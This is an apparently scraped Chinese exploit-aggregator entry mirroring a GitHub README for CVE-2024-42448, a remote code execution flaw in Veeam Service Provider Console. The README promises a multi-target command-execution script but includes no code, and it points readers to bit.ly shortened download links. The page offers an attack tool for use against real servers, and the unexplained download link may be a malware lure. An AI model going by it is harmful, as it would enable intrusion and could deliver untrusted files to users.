POC详情: 7068322f7cd9e0c0de9d184310aa9f79108d3496

来源
https://github.com/h3lye/CVE-2024-42448-RCE
关联漏洞
标题: Veeam Service Provider Console 安全漏洞 (CVE-2024-42448)
描述:Veeam Service Provider Console是美国Veeam公司的一个支持云的平台。 Veeam Service Provider Console 8.1版本存在安全漏洞,该漏洞源于管理代理机在获得服务器授权的情况下,可以对VSPC服务器机执行远程代码执行。
描述
Veeam Service Provider Console (VSPC) remote code execution.
介绍
# CVE-2024-42448-RCE
Veeam Service Provider Console (`VSPC`) remote code execution.

[Download link here](https://bit.ly/4gknFFV)

# Details:
is a critical vulnerability identified in the Veeam Service Provider Console (`VSPC`) with a CVSS score of `9.9.`<br>
This vulnerability allows for remote code execution (`RCE`).<br>

# About:
(`files.zip`) here you'll find the files and including but not limit to tcp packets captured during testing<br>
some progress with `IDA` (which was unnecessary), but will be effective if you try to understand the root cause<br>
and produce a working exploit.<br>
every step is explained clearly with screenshots inside the process.pdf.<br>
for educational purpose only.
</p>

A python script (`CVE-2024-42448.py`) which trigger the vulnerability and execute user supplied command<br>
can also execute command on single and multiple targets(IP list) with multi-threading capability.<br>


# Download: [here](https://bit.ly/4gknFFV)
文件快照

 [4.0K]  /data/pocs/7068322f7cd9e0c0de9d184310aa9f79108d3496
└── [ 966]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。